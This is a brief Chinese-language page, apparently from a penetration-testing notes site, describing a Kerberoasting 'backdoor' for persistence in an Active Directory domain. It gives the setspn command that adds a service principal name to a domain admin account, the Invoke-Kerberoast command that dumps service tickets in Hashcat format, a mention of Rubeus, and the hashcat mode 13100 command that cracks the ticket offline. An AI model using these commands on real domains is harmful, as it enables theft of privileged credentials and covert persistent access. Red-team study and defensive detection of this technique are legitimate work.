Kerberoasting后门

当有setspn权限时,为域用户添加一个SPN
>setspn -U -A RDP/zone.com godadmin
image
域内任何主机可以使用Kerberoast 获得TGS
https://github.com/malachitheninja/Invoke-Kerberoast
image
>Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation |Out-File xx.txt
image
或使用rubeus.exe
image
破解
>hashcat -m 13100 -a 0 kerberos.txt wordlist.txt
上一页Invoke Tasks后门&权限维持下一页Metsvc

最后更新于

这有帮助吗?